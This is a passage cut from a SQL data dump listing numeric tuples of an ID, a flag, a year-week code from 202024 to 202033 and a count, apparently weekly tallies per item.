86,1,'202024',4),(1602,1,'202024',4),(1610,1,'202024',4),(1614,1,'202024',4),(1715,1,'202024',4),(1720,1,'202024',4),(1722,1,'202024',4),(1734,1,'202024',4),(1737,1,'202024',4),(1743,1,'202024',4),(1745,1,'202024',4),(1747,1,'202024',4),(1774,1,'202024',4),(2297,1,'202024',4),(2658,1,'202024',4),(3023,1,'202024',4),(3027,1,'202024',4),(3034,1,'202024',4),(3072,1,'202024',4),(480,1,'202024',5),(486,1,'202024',5),(570,1,'202024',5),(1582,1,'202024',5),(1741,1,'202024',5),(2956,1,'202024',5),(3005,1,'202024',5),(483,1,'202024',6),(1588,1,'202024',6),(1606,1,'202024',6),(2751,1,'202024',6),(2813,1,'202024',6),(2911,1,'202024',6),(3006,1,'202024',6),(3030,1,'202024',6),(3045,1,'202024',6),(1604,1,'202024',7),(1718,1,'202024',7),(3063,1,'202024',7),(3060,1,'202024',8),(1730,1,'202024',10),(2309,1,'202024',10),(2457,1,'202024',10),(3069,1,'202024',10),(3066,1,'202024',12),(2609,1,'202024',21),(1600,1,'202024',23),(467,1,'202025',1),(472,1,'202025',1),(476,1,'202025',1),(477,1,'202025',1),(480,1,'202025',1),(481,1,'202025',1),(485,1,'202025',1),(1544,1,'202025',1),(1584,1,'202025',1),(1590,1,'202025',1),(1592,1,'202025',1),(1598,1,'202025',1),(1602,1,'202025',1),(1610,1,'202025',1),(1705,1,'202025',1),(1709,1,'202025',1),(1720,1,'202025',1),(1726,1,'202025',1),(1734,1,'202025',1),(1768,1,'202025',1),(1772,1,'202025',1),(1780,1,'202025',1),(2150,1,'202025',1),(2159,1,'202025',1),(2161,1,'202025',1),(2165,1,'202025',1),(2252,1,'202025',1),(2293,1,'202025',1),(2296,1,'202025',1),(2704,1,'202025',1),(3087,1,'202025',1),(468,1,'202025',2),(469,1,'202025',2),(478,1,'202025',2),(482,1,'202025',2),(483,1,'202025',2),(487,1,'202025',2),(1588,1,'202025',2),(1594,1,'202025',2),(1695,1,'202025',2),(1699,1,'202025',2),(1703,1,'202025',2),(1713,1,'202025',2),(1732,1,'202025',2),(1737,1,'202025',2),(1739,1,'202025',2),(1747,1,'202025',2),(1751,1,'202025',2),(1770,1,'202025',2),(1782,1,'202025',2),(2063,1,'202025',2),(2156,1,'202025',2),(2248,1,'202025',2),(2297,1,'202025',2),(2748,1,'202025',2),(2775,1,'202025',2),(2809,1,'202025',2),(2813,1,'202025',2),(2911,1,'202025',2),(3004,1,'202025',2),(3005,1,'202025',2),(3027,1,'202025',2),(3034,1,'202025',2),(3045,1,'202025',2),(3060,1,'202025',2),(3083,1,'202025',2),(473,1,'202025',3),(479,1,'202025',3),(486,1,'202025',3),(488,1,'202025',3),(1586,1,'202025',3),(1604,1,'202025',3),(1612,1,'202025',3),(1697,1,'202025',3),(1701,1,'202025',3),(1707,1,'202025',3),(1728,1,'202025',3),(1730,1,'202025',3),(1743,1,'202025',3),(1749,1,'202025',3),(1766,1,'202025',3),(1774,1,'202025',3),(1776,1,'202025',3),(2148,1,'202025',3),(2152,1,'202025',3),(2558,1,'202025',3),(2964,1,'202025',3),(2965,1,'202025',3),(2993,1,'202025',3),(3023,1,'202025',3),(3038,1,'202025',3),(471,1,'202025',4),(1596,1,'202025',4),(1608,1,'202025',4),(1715,1,'202025',4),(1741,1,'202025',4),(1745,1,'202025',4),(1778,1,'202025',4),(2617,1,'202025',4),(2956,1,'202025',4),(470,1,'202025',5),(484,1,'202025',5),(570,1,'202025',5),(1582,1,'202025',5),(1711,1,'202025',5),(1718,1,'202025',5),(2154,1,'202025',5),(2178,1,'202025',5),(2751,1,'202025',5),(2769,1,'202025',5),(2801,1,'202025',5),(2804,1,'202025',5),(2989,1,'202025',5),(2991,1,'202025',5),(3006,1,'202025',5),(3041,1,'202025',5),(3079,1,'202025',5),(3081,1,'202025',5),(1614,1,'202025',6),(1724,1,'202025',6),(2457,1,'202025',6),(2658,1,'202025',6),(3030,1,'202025',6),(474,1,'202025',7),(1606,1,'202025',7),(2609,1,'202025',7),(3072,1,'202025',7),(3066,1,'202025',9),(1600,1,'202025',10),(1722,1,'202025',10),(3063,1,'202025',10),(3069,1,'202025',11),(2309,1,'202025',12),(1596,1,'202026',1),(1705,1,'202026',1),(1749,1,'202026',1),(1780,1,'202026',1),(2658,1,'202026',1),(2804,1,'202026',1),(3023,1,'202026',1),(469,1,'202026',2),(471,1,'202026',2),(472,1,'202026',2),(474,1,'202026',2),(476,1,'202026',2),(477,1,'202026',2),(479,1,'202026',2),(481,1,'202026',2),(482,1,'202026',2),(483,1,'202026',2),(484,1,'202026',2),(487,1,'202026',2),(488,1,'202026',2),(1544,1,'202026',2),(1584,1,'202026',2),(1590,1,'202026',2),(1602,1,'202026',2),(1695,1,'202026',2),(1697,1,'202026',2),(1701,1,'202026',2),(1707,1,'202026',2),(1709,1,'202026',2),(1713,1,'202026',2),(1715,1,'202026',2),(1720,1,'202026',2),(1722,1,'202026',2),(1724,1,'202026',2),(1734,1,'202026',2),(1747,1,'202026',2),(1768,1,'202026',2),(1770,1,'202026',2),(1776,1,'202026',2),(1778,1,'202026',2),(1782,1,'202026',2),(2150,1,'202026',2),(2154,1,'202026',2),(2156,1,'202026',2),(2165,1,'202026',2),(2558,1,'202026',2),(2993,1,'202026',2),(3006,1,'202026',2),(3038,1,'202026',2),(3079,1,'202026',2),(467,1,'202026',3),(468,1,'202026',3),(470,1,'202026',3),(480,1,'202026',3),(1592,1,'202026',3),(1594,1,'202026',3),(1606,1,'202026',3),(1608,1,'202026',3),(1610,1,'202026',3),(1612,1,'202026',3),(1699,1,'202026',3),(1703,1,'202026',3),(1718,1,'202026',3),(1726,1,'202026',3),(1732,1,'202026',3),(1737,1,'202026',3),(1743,1,'202026',3),(1751,1,'202026',3),(1772,1,'202026',3),(1774,1,'202026',3),(2063,1,'202026',3),(2148,1,'202026',3),(2152,1,'202026',3),(2159,1,'202026',3),(2161,1,'202026',3),(2252,1,'202026',3),(2293,1,'202026',3),(2704,1,'202026',3),(2911,1,'202026',3),(2989,1,'202026',3),(2991,1,'202026',3),(3004,1,'202026',3),(3034,1,'202026',3),(3041,1,'202026',3),(3063,1,'202026',3),(3072,1,'202026',3),(3081,1,'202026',3),(3083,1,'202026',3),(3087,1,'202026',3),(478,1,'202026',4),(1598,1,'202026',4),(1614,1,'202026',4),(1739,1,'202026',4),(1741,1,'202026',4),(1745,1,'202026',4),(1766,1,'202026',4),(2248,1,'202026',4),(2296,1,'202026',4),(2297,1,'202026',4),(2617,1,'202026',4),(2748,1,'202026',4),(2956,1,'202026',4),(2965,1,'202026',4),(3045,1,'202026',4),(3066,1,'202026',4),(3092,1,'202026',4),(3097,1,'202026',4),(473,1,'202026',5),(485,1,'202026',5),(1711,1,'202026',5),(1728,1,'202026',5),(2178,1,'202026',5),(2751,1,'202026',5),(2775,1,'202026',5),(2964,1,'202026',5),(3030,1,'202026',5),(3096,1,'202026',5),(486,1,'202026',6),(2769,1,'202026',6),(2809,1,'202026',6),(2813,1,'202026',6),(3005,1,'202026',6),(3027,1,'202026',6),(3060,1,'202026',7),(1582,1,'202026',8),(1586,1,'202026',8),(2801,1,'202026',8),(570,1,'202026',9),(2457,1,'202026',9),(3069,1,'202026',10),(1730,1,'202026',12),(1600,1,'202026',13),(1604,1,'202026',15),(3090,1,'202026',15),(2609,1,'202026',16),(1588,1,'202026',17),(2309,1,'202026',34),(1722,1,'202027',1),(469,1,'202027',2),(471,1,'202027',2),(476,1,'202027',2),(477,1,'202027',2),(478,1,'202027',2),(480,1,'202027',2),(482,1,'202027',2),(570,1,'202027',2),(1590,1,'202027',2),(1596,1,'202027',2),(1608,1,'202027',2),(1699,1,'202027',2),(1713,1,'202027',2),(1715,1,'202027',2),(1720,1,'202027',2),(1724,1,'202027',2),(1728,1,'202027',2),(1732,1,'202027',2),(1743,1,'202027',2),(1745,1,'202027',2),(1751,1,'202027',2),(1768,1,'202027',2),(1770,1,'202027',2),(1774,1,'202027',2),(1776,1,'202027',2),(1778,1,'202027',2),(1780,1,'202027',2),(1782,1,'202027',2),(2150,1,'202027',2),(2156,1,'202027',2),(2159,1,'202027',2),(2161,1,'202027',2),(2248,1,'202027',2),(2293,1,'202027',2),(2296,1,'202027',2),(2297,1,'202027',2),(2956,1,'202027',2),(468,1,'202027',3),(472,1,'202027',3),(473,1,'202027',3),(474,1,'202027',3),(483,1,'202027',3),(484,1,'202027',3),(485,1,'202027',3),(487,1,'202027',3),(488,1,'202027',3),(1544,1,'202027',3),(1594,1,'202027',3),(1598,1,'202027',3),(1602,1,'202027',3),(1695,1,'202027',3),(1697,1,'202027',3),(1703,1,'202027',3),(1707,1,'202027',3),(1709,1,'202027',3),(1711,1,'202027',3),(1726,1,'202027',3),(1734,1,'202027',3),(1739,1,'202027',3),(1747,1,'202027',3),(2063,1,'202027',3),(2154,1,'202027',3),(2165,1,'202027',3),(2658,1,'202027',3),(2911,1,'202027',3),(2989,1,'202027',3),(3004,1,'202027',3),(3023,1,'202027',3),(3034,1,'202027',3),(3038,1,'202027',3),(3063,1,'202027',3),(3066,1,'202027',3),(3079,1,'202027',3),(3081,1,'202027',3),(3083,1,'202027',3),(467,1,'202027',4),(1610,1,'202027',4),(1612,1,'202027',4),(1701,1,'202027',4),(1749,1,'202027',4),(1766,1,'202027',4),(2148,1,'202027',4),(2152,1,'202027',4),(2178,1,'202027',4),(2252,1,'202027',4),(2748,1,'202027',4),(2965,1,'202027',4),(3006,1,'202027',4),(3041,1,'202027',4),(3072,1,'202027',4),(3092,1,'202027',4),(470,1,'202027',5),(479,1,'202027',5),(481,1,'202027',5),(1584,1,'202027',5),(1586,1,'202027',5),(1592,1,'202027',5),(1718,1,'202027',5),(1737,1,'202027',5),(1772,1,'202027',5),(2558,1,'202027',5),(2617,1,'202027',5),(2809,1,'202027',5),(3096,1,'202027',5),(486,1,'202027',6),(1705,1,'202027',6),(2704,1,'202027',6),(2775,1,'202027',6),(2804,1,'202027',6),(2964,1,'202027',6),(2991,1,'202027',6),(3005,1,'202027',6),(3045,1,'202027',6),(3087,1,'202027',6),(1582,1,'202027',7),(1730,1,'202027',7),(1741,1,'202027',7),(2769,1,'202027',7),(2993,1,'202027',7),(3030,1,'202027',7),(3097,1,'202027',7),(3060,1,'202027',8),(1606,1,'202027',9),(2751,1,'202027',9),(3069,1,'202027',9),(1614,1,'202027',10),(3090,1,'202027',10),(3027,1,'202027',11),(1588,1,'202027',13),(2813,1,'202027',13),(2457,1,'202027',14),(2609,1,'202027',14),(1600,1,'202027',15),(1604,1,'202027',15),(2801,1,'202027',17),(2309,1,'202027',26),(472,1,'202028',1),(478,1,'202028',1),(485,1,'202028',1),(488,1,'202028',1),(1544,1,'202028',1),(1608,1,'202028',1),(1697,1,'202028',1),(1699,1,'202028',1),(1701,1,'202028',1),(1705,1,'202028',1),(1707,1,'202028',1),(1709,1,'202028',1),(1711,1,'202028',1),(1715,1,'202028',1),(1724,1,'202028',1),(1726,1,'202028',1),(1728,1,'202028',1),(1732,1,'202028',1),(1737,1,'202028',1),(1741,1,'202028',1),(1745,1,'202028',1),(2297,1,'202028',1),(2558,1,'202028',1),(2804,1,'202028',1),(2989,1,'202028',1),(3004,1,'202028',1),(3087,1,'202028',1),(467,1,'202028',2),(469,1,'202028',2),(474,1,'202028',2),(476,1,'202028',2),(479,1,'202028',2),(484,1,'202028',2),(570,1,'202028',2),(1582,1,'202028',2),(1590,1,'202028',2),(1592,1,'202028',2),(1594,1,'202028',2),(1598,1,'202028',2),(1614,1,'202028',2),(1713,1,'202028',2),(1720,1,'202028',2),(1734,1,'202028',2),(1739,1,'202028',2),(1768,1,'202028',2),(1770,1,'202028',2),(1772,1,'202028',2),(1774,1,'202028',2),(1782,1,'202028',2),(2150,1,'202028',2),(2159,1,'202028',2),(2161,1,'202028',2),(2178,1,'202028',2),(2248,1,'202028',2),(2252,1,'202028',2),(2296,1,'202028',2),(2617,1,'202028',2),(2658,1,'202028',2),(2809,1,'202028',2),(2964,1,'202028',2),(2965,1,'202028',2),(2991,1,'202028',2),(3006,1,'202028',2),(3023,1,'202028',2),(470,1,'202028',3),(471,1,'202028',3),(477,1,'202028',3),(480,1,'202028',3),(481,1,'202028',3),(482,1,'202028',3),(483,1,'202028',3),(486,1,'202028',3),(1584,1,'202028',3),(1586,1,'202028',3),(1602,1,'202028',3),(1610,1,'202028',3),(1695,1,'202028',3),(1747,1,'202028',3),(1751,1,'202028',3),(1766,1,'202028',3),(1776,1,'202028',3),(1778,1,'202028',3),(2152,1,'202028',3),(2154,1,'202028',3),(2156,1,'202028',3),(2293,1,'202028',3),(2748,1,'202028',3),(2751,1,'202028',3),(2775,1,'202028',3),(2993,1,'202028',3),(3005,1,'202028',3),(3030,1,'202028',3),(3045,1,'202028',3),(3063,1,'202028',3),(3079,1,'202028',3),(3081,1,'202028',3),(473,1,'202028',4),(1596,1,'202028',4),(1612,1,'202028',4),(1703,1,'202028',4),(1722,1,'202028',4),(1743,1,'202028',4),(1780,1,'202028',4),(2704,1,'202028',4),(2911,1,'202028',4),(2956,1,'202028',4),(3034,1,'202028',4),(3038,1,'202028',4),(3066,1,'202028',4),(1606,1,'202028',5),(1718,1,'202028',5),(2063,1,'202028',5),(2148,1,'202028',5),(3027,1,'202028',5),(3041,1,'202028',5),(3060,1,'202028',5),(3072,1,'202028',5),(3092,1,'202028',5),(468,1,'202028',6),(487,1,'202028',6),(1749,1,'202028',6),(2165,1,'202028',6),(2457,1,'202028',6),(3083,1,'202028',6),(2769,1,'202028',7),(3096,1,'202028',7),(3097,1,'202028',7),(1730,1,'202028',8),(2813,1,'202028',11),(1604,1,'202028',13),(2609,1,'202028',15),(3069,1,'202028',16),(2801,1,'202028',19),(3090,1,'202028',19),(2309,1,'202028',27),(1588,1,'202028',33),(1600,1,'202028',34),(1598,1,'202029',2),(1749,1,'202029',2),(1776,1,'202029',2),(1778,1,'202029',2),(1780,1,'202029',2),(2704,1,'202029',2),(3041,1,'202029',2),(467,1,'202029',3),(482,1,'202029',3),(1590,1,'202029',3),(1592,1,'202029',3),(1612,1,'202029',3),(1730,1,'202029',3),(1747,1,'202029',3),(1751,1,'202029',3),(1768,1,'202029',3),(2152,1,'202029',3),(2154,1,'202029',3),(2156,1,'202029',3),(2161,1,'202029',3),(2293,1,'202029',3),(2296,1,'202029',3),(2801,1,'202029',3),(2911,1,'202029',3),(2964,1,'202029',3),(3030,1,'202029',3),(3063,1,'202029',3),(468,1,'202029',4),(476,1,'202029',4),(478,1,'202029',4),(479,1,'202029',4),(481,1,'202029',4),(484,1,'202029',4),(487,1,'202029',4),(488,1,'202029',4),(1584,1,'202029',4),(1604,1,'202029',4),(1695,1,'202029',4),(1703,1,'202029',4),(1705,1,'202029',4),(1707,1,'202029',4),(1709,1,'202029',4),(1713,1,'202029',4),(1715,1,'202029',4),(1718,1,'202029',4),(1726,1,'202029',4),(1739,1,'202029',4),(1766,1,'202029',4),(1770,1,'202029',4),(1772,1,'202029',4),(2148,1,'202029',4),(2150,1,'202029',4),(2178,1,'202029',4),(2297,1,'202029',4),(2748,1,'202029',4),(2775,1,'202029',4),(2991,1,'202029',4),(2993,1,'202029',4),(3023,1,'202029',4),(3027,1,'202029',4),(3034,1,'202029',4),(3060,1,'202029',4),(3069,1,'202029',4),(3096,1,'202029',4),(3097,1,'202029',4),(472,1,'202029',5),(483,1,'202029',5),(485,1,'202029',5),(1582,1,'202029',5),(1608,1,'202029',5),(1697,1,'202029',5),(1699,1,'202029',5),(1711,1,'202029',5),(1724,1,'202029',5),(1728,1,'202029',5),(1732,1,'202029',5),(1734,1,'202029',5),(1737,1,'202029',5),(1743,1,'202029',5),(1745,1,'202029',5),(1774,1,'202029',5),(1782,1,'202029',5),(2063,1,'202029',5),(2159,1,'202029',5),(2165,1,'202029',5),(2248,1,'202029',5),(2457,1,'202029',5),(2558,1,'202029',5),(2813,1,'202029',5),(2956,1,'202029',5),(2989,1,'202029',5),(3004,1,'202029',5),(3005,1,'202029',5),(3006,1,'202029',5),(3045,1,'202029',5),(3083,1,'202029',5),(3092,1,'202029',5),(469,1,'202029',6),(470,1,'202029',6),(474,1,'202029',6),(480,1,'202029',6),(570,1,'202029',6),(1596,1,'202029',6),(1610,1,'202029',6),(1722,1,'202029',6),(2252,1,'202029',6),(2751,1,'202029',6),(2804,1,'202029',6),(3072,1,'202029',6),(3079,1,'202029',6),(3081,1,'202029',6),(3087,1,'202029',6),(3104,1,'202029',6),(3107,1,'202029',6),(1544,1,'202029',7),(1586,1,'202029',7),(1594,1,'202029',7),(1602,1,'202029',7),(2617,1,'202029',7),(3066,1,'202029',7),(3102,1,'202029',7),(471,1,'202029',8),(477,1,'202029',8),(486,1,'202029',8),(1741,1,'202029',8),(2658,1,'202029',8),(2769,1,'202029',8),(3109,1,'202029',8),(1701,1,'202029',9),(1720,1,'202029',9),(2809,1,'202029',9),(2965,1,'202029',9),(3038,1,'202029',9),(473,1,'202029',10),(1614,1,'202029',11),(2609,1,'202029',11),(1588,1,'202029',12),(3090,1,'202029',13),(1606,1,'202029',20),(1600,1,'202029',22),(2309,1,'202029',22),(1610,1,'202030',1),(1720,1,'202030',1),(467,1,'202030',2),(472,1,'202030',2),(477,1,'202030',2),(478,1,'202030',2),(480,1,'202030',2),(481,1,'202030',2),(483,1,'202030',2),(485,1,'202030',2),(488,1,'202030',2),(1592,1,'202030',2),(1602,1,'202030',2),(1697,1,'202030',2),(1713,1,'202030',2),(1732,1,'202030',2),(1734,1,'202030',2),(2293,1,'202030',2),(2748,1,'202030',2),(2769,1,'202030',2),(2809,1,'202030',2),(2813,1,'202030',2),(2956,1,'202030',2),(2965,1,'202030',2),(3004,1,'202030',2),(3023,1,'202030',2),(3027,1,'202030',2),(3079,1,'202030',2),(476,1,'202030',3),(479,1,'202030',3),(482,1,'202030',3),(487,1,'202030',3),(1544,1,'202030',3),(1584,1,'202030',3),(1612,1,'202030',3),(1695,1,'202030',3),(1699,1,'202030',3),(1701,1,'202030',3),(1705,1,'202030',3),(1707,1,'202030',3),(1709,1,'202030',3),(1711,1,'202030',3),(1722,1,'202030',3),(1726,1,'202030',3),(1728,1,'202030',3),(1730,1,'202030',3),(1737,1,'202030',3),(1743,1,'202030',3),(1745,1,'202030',3),(1768,1,'202030',3),(1770,1,'202030',3),(1782,1,'202030',3),(2148,1,'202030',3),(2156,1,'202030',3),(2165,1,'202030',3),(2248,1,'202030',3),(2252,1,'202030',3),(2297,1,'202030',3),(2617,1,'202030',3),(2704,1,'202030',3),(2801,1,'202030',3),(2804,1,'202030',3),(3006,1,'202030',3),(3072,1,'202030',3),(3083,1,'202030',3),(3107,1,'202030',3),(474,1,'202030',4),(484,1,'202030',4),(486,1,'202030',4),(570,1,'202030',4),(1590,1,'202030',4),(1614,1,'202030',4),(1703,1,'202030',4),(1718,1,'202030',4),(1724,1,'202030',4),(1739,1,'202030',4),(1741,1,'202030',4),(1747,1,'202030',4),(1749,1,'202030',4),(1751,1,'202030',4),(1772,1,'202030',4),(1774,1,'202030',4),(1776,1,'202030',4),(2063,1,'202030',4),(2150,1,'202030',4),(2152,1,'202030',4),(2159,1,'202030',4),(2178,1,'202030',4),(2296,1,'202030',4),(2457,1,'202030',4),(2558,1,'202030',4),(2658,1,'202030',4),(2775,1,'202030',4),(2911,1,'202030',4),(3038,1,'202030',4),(3066,1,'202030',4),(3109,1,'202030',4),(469,1,'202030',5),(473,1,'202030',5),(1780,1,'202030',5),(2161,1,'202030',5),(2609,1,'202030',5),(2993,1,'202030',5),(3034,1,'202030',5),(3041,1,'202030',5),(3045,1,'202030',5),(3063,1,'202030',5),(3087,1,'202030',5),(468,1,'202030',6),(470,1,'202030',6),(471,1,'202030',6),(1586,1,'202030',6),(1594,1,'202030',6),(1598,1,'202030',6),(1608,1,'202030',6),(1715,1,'202030',6),(1766,1,'202030',6),(1778,1,'202030',6),(2154,1,'202030',6),(2309,1,'202030',6),(2964,1,'202030',6),(2991,1,'202030',6),(3005,1,'202030',6),(3081,1,'202030',6),(3096,1,'202030',6),(3102,1,'202030',6),(3097,1,'202030',7),(3104,1,'202030',7),(1582,1,'202030',9),(1606,1,'202030',9),(2751,1,'202030',9),(1588,1,'202030',10),(1596,1,'202030',10),(2989,1,'202030',10),(3092,1,'202030',10),(1600,1,'202030',11),(3069,1,'202030',11),(3090,1,'202030',11),(1604,1,'202030',12),(3030,1,'202030',15),(3060,1,'202030',15),(469,1,'202031',3),(472,1,'202031',3),(476,1,'202031',3),(481,1,'202031',3),(485,1,'202031',3),(1544,1,'202031',3),(1584,1,'202031',3),(1590,1,'202031',3),(1598,1,'202031',3),(1610,1,'202031',3),(1697,1,'202031',3),(1711,1,'202031',3),(1720,1,'202031',3),(1724,1,'202031',3),(1734,1,'202031',3),(1741,1,'202031',3),(1745,1,'202031',3),(1747,1,'202031',3),(1774,1,'202031',3),(1778,1,'202031',3),(2063,1,'202031',3),(2165,1,'202031',3),(2248,1,'202031',3),(2252,1,'202031',3),(2293,1,'202031',3),(2558,1,'202031',3),(2704,1,'202031',3),(2748,1,'202031',3),(2964,1,'202031',3),(2965,1,'202031',3),(3004,1,'202031',3),(3023,1,'202031',3),(3038,1,'202031',3),(3072,1,'202031',3),(467,1,'202031',4),(468,1,'202031',4),(477,1,'202031',4),(479,1,'202031',4),(483,1,'202031',4),(484,1,'202031',4),(488,1,'202031',4),(1592,1,'202031',4),(1594,1,'202031',4),(1602,1,'202031',4),(1612,1,'202031',4),(1703,1,'202031',4),(1707,1,'202031',4),(1715,1,'202031',4),(1728,1,'202031',4),(1737,1,'202031',4),(1739,1,'202031',4),(1743,1,'202031',4),(1749,1,'202031',4),(1751,1,'202031',4),(1772,1,'202031',4),(1776,1,'202031',4),(1780,1,'202031',4),(1782,1,'202031',4),(2150,1,'202031',4),(2154,1,'202031',4),(2159,1,'202031',4),(2296,1,'202031',4),(2658,1,'202031',4),(2775,1,'202031',4),(2804,1,'202031',4),(2911,1,'202031',4),(2989,1,'202031',4),(2993,1,'202031',4),(3034,1,'202031',4),(3063,1,'202031',4),(3081,1,'202031',4),(3087,1,'202031',4),(3090,1,'202031',4),(3096,1,'202031',4),(470,1,'202031',5),(471,1,'202031',5),(474,1,'202031',5),(480,1,'202031',5),(482,1,'202031',5),(487,1,'202031',5),(1586,1,'202031',5),(1606,1,'202031',5),(1699,1,'202031',5),(1701,1,'202031',5),(1705,1,'202031',5),(1709,1,'202031',5),(1713,1,'202031',5),(1722,1,'202031',5),(1726,1,'202031',5),(1732,1,'202031',5),(1770,1,'202031',5),(2152,1,'202031',5),(2156,1,'202031',5),(2161,1,'202031',5),(2178,1,'202031',5),(2297,1,'202031',5),(2809,1,'202031',5),(2956,1,'202031',5),(2991,1,'202031',5),(3005,1,'202031',5),(3006,1,'202031',5),(3041,1,'202031',5),(3045,1,'202031',5),(3066,1,'202031',5),(473,1,'202031',6),(486,1,'202031',6),(1608,1,'202031',6),(1766,1,'202031',6),(1768,1,'202031',6),(2148,1,'202031',6),(2751,1,'202031',6),(3079,1,'202031',6),(3083,1,'202031',6),(3097,1,'202031',6),(1718,1,'202031',7),(3027,1,'202031',7),(478,1,'202031',9),(1582,1,'202031',9),(1596,1,'202031',9),(1695,1,'202031',9),(3092,1,'202031',9),(3102,1,'202031',9),(3104,1,'202031',9),(3109,1,'202031',9),(2617,1,'202031',10),(3060,1,'202031',10),(3069,1,'202031',10),(2457,1,'202031',11),(2813,1,'202031',12),(3107,1,'202031',12),(1614,1,'202031',13),(2769,1,'202031',13),(570,1,'202031',14),(1604,1,'202031',15),(2801,1,'202031',15),(3030,1,'202031',17),(2609,1,'202031',18),(1730,1,'202031',19),(1600,1,'202031',21),(2309,1,'202031',25),(1588,1,'202031',26),(1584,1,'202032',2),(1776,1,'202032',2),(2617,1,'202032',2),(2809,1,'202032',2),(2964,1,'202032',2),(3034,1,'202032',2),(3038,1,'202032',2),(3092,1,'202032',2),(467,1,'202032',3),(468,1,'202032',3),(469,1,'202032',3),(471,1,'202032',3),(474,1,'202032',3),(476,1,'202032',3),(477,1,'202032',3),(478,1,'202032',3),(479,1,'202032',3),(480,1,'202032',3),(482,1,'202032',3),(1544,1,'202032',3),(1590,1,'202032',3),(1592,1,'202032',3),(1594,1,'202032',3),(1608,1,'202032',3),(1610,1,'202032',3),(1695,1,'202032',3),(1697,1,'202032',3),(1711,1,'202032',3),(1718,1,'202032',3),(1724,1,'202032',3),(1726,1,'202032',3),(1734,1,'202032',3),(1737,1,'202032',3),(1739,1,'202032',3),(1745,1,'202032',3),(1747,1,'202032',3),(1751,1,'202032',3),(1766,1,'202032',3),(1768,1,'202032',3),(1770,1,'202032',3),(1772,1,'202032',3),(1774,1,'202032',3),(2150,1,'202032',3),(2161,1,'202032',3),(2165,1,'202032',3),(2296,1,'202032',3),(2558,1,'202032',3),(2658,1,'202032',3),(2704,1,'202032',3),(2748,1,'202032',3),(2775,1,'202032',3),(2804,1,'202032',3),(2991,1,'202032',3),(3045,1,'202032',3),(3063,1,'202032',3),(3079,1,'202032',3),(3087,1,'202032',3),(3097,1,'202032',3),(470,1,'202032',4),(472,1,'202032',4),(483,1,'202032',4),(485,1,'202032',4),(1586,1,'202032',4),(1701,1,'202032',4),(1703,1,'202032',4),(1705,1,'202032',4),(1707,1,'202032',4),(1713,1,'202032',4),(1715,1,'202032',4),(1720,1,'202032',4),(1722,1,'202032',4),(1732,1,'202032',4),(1749,1,'202032',4),(1778,1,'202032',4),(1780,1,'202032',4),(1782,1,'202032',4),(2063,1,'202032',4),(2148,1,'202032',4),(2156,1,'202032',4),(2178,1,'202032',4),(2293,1,'202032',4),(2297,1,'202032',4),(2801,1,'202032',4),(2911,1,'202032',4),(3005,1,'202032',4),(3006,1,'202032',4),(3023,1,'202032',4),(3096,1,'202032',4),(473,1,'202032',5),(481,1,'202032',5),(484,1,'202032',5),(486,1,'202032',5),(487,1,'202032',5),(488,1,'202032',5),(1596,1,'202032',5),(1598,1,'202032',5),(1602,1,'202032',5),(1612,1,'202032',5),(1699,1,'202032',5),(1728,1,'202032',5),(1741,1,'202032',5),(1743,1,'202032',5),(2154,1,'202032',5),(2248,1,'202032',5),(2769,1,'202032',5),(2965,1,'202032',5),(3072,1,'202032',5),(3083,1,'202032',5),(3102,1,'202032',5),(3109,1,'202032',5),(570,1,'202032',6),(1582,1,'202032',6),(1709,1,'202032',6),(2159,1,'202032',6),(2457,1,'202032',6),(2751,1,'202032',6),(2813,1,'202032',6),(2989,1,'202032',6),(3004,1,'202032',6),(3027,1,'202032',6),(3030,1,'202032',6),(3041,1,'202032',6),(3066,1,'202032',6),(3081,1,'202032',6),(3090,1,'202032',6),(3104,1,'202032',6),(3107,1,'202032',6),(2152,1,'202032',7),(2252,1,'202032',7),(2993,1,'202032',7),(1730,1,'202032',8),(2609,1,'202032',8),(2956,1,'202032',8),(1588,1,'202032',9),(1606,1,'202032',9),(3069,1,'202032',10),(1604,1,'202032',11),(2309,1,'202032',12),(3060,1,'202032',13),(1600,1,'202032',15),(1614,1,'202032',15),(467,1,'202033',1),(482,1,'202033',1),(1695,1,'202033',1),(1697,1,'202033',1),(1705,1,'202033',1),(1749,1,'202033',1),(1768,1,'202033',1),(2293,1,'202033',1),(3004,1,'202033',1),(471,1,'202033',2),(472,1,'202033',2),(476,1,'202033',2),(479,1,'202033',2),(484,1,'202033',2),(488,1,'202033',2),(1703,1,'202033',2),(1711,1,'202033',2),(1713,1,'202033',2),(1715,1,'202033',2),(1720,1,'202033',2),(1726,1,'202033',2),(1732,1,'202033',2),(1739,1,'202033',2),(1741,1,'202033',2),(1745,1,'202033',2),(1751,1,'202033',2),(1774,1,'202033',2),(1776,1,'202033',2),(2152,1,'202033',2),(2154,1,'202033',2),(2156,1,'202033',2),(2165,1,'202033',2),(2297,1,'202033',2),(2748,1,'202033',2),(2965,1,'202033',2),(2991,1,'202033',2),(3006,1,'202033',2),(3041,1,'202033',2),(3063,1,'202033',2),(3072,1,'202033',2),(3092,1,'202033',2),(3096,1,'202033',2),(3097,1,'202033',2),(478,1,'202033',3),(481,1,'202033',3),(1590,1,'202033',3),(1608,1,'202033',3),(1701,1,'202033',3),(1707,1,'202033',3),(1722,1,'202033',3),(1734,1,'202033',3),(1743,1,'202033',3),(1778,1,'202033',3),(2063,1,'202033',3),(2148,1,'202033',3),(2150,1,'202033',3),(2159,1,'202033',3),(2248,1,'202033',3),(2296,1,'202033',3),(2558,1,'202033',3),(2804,1,'202033',3),(2993,1,'202033',3),(3023,1,'202033',3),(3060,1,'202033',3),(3079,1,'202033',3),(470,1,'202033',4),(483,1,'202033',4),(485,1,'202033',4),(570,1,'202033',4),(1544,1,'202033',4),(1584,1,'202033',4),(1598,1,'202033',4),(1602,1,'202033',4),(1612,1,'202033',4),(1699,1,'202033',4),(1709,1,'202033',4),(1747,1,'202033',4),(1770,1,'202033',4),(1772,1,'202033',4),(1782,1,'202033',4),(2161,1,'202033',4),(2252,1,'202033',4),(2617,1,'202033',4),(2704,1,'202033',4),(2775,1,'202033',4),(2911,1,'202033',4),(2964,1,'202033',4),(3027,1,'202033',4),(3038,1,'202033',4),(3066,1,'202033',4),(3083,1,'202033',4),(3087,1,'202033',4),(468,1,'202033',5),(477,1,'202033',5),(487,1,'202033',5),(1592,1,'202033',5),(1594,1,'202033',5),(1728,1,'202033',5),(1737,1,'202033',5),(1780,1,'202033',5),(2178,1,'202033',5),(2813,1,'202033',5),(3005,1,'202033',5),(3034,1,'202033',5),(3090,1,'202033',5),(3107,1,'202033',5),(469,1,'202033',6),(474,1,'202033',6),(480,1,'202033',6),(1586,1,'202033',6),(1724,1,'202033',6),(1766,1,'202033',6),(2769,1,'202033',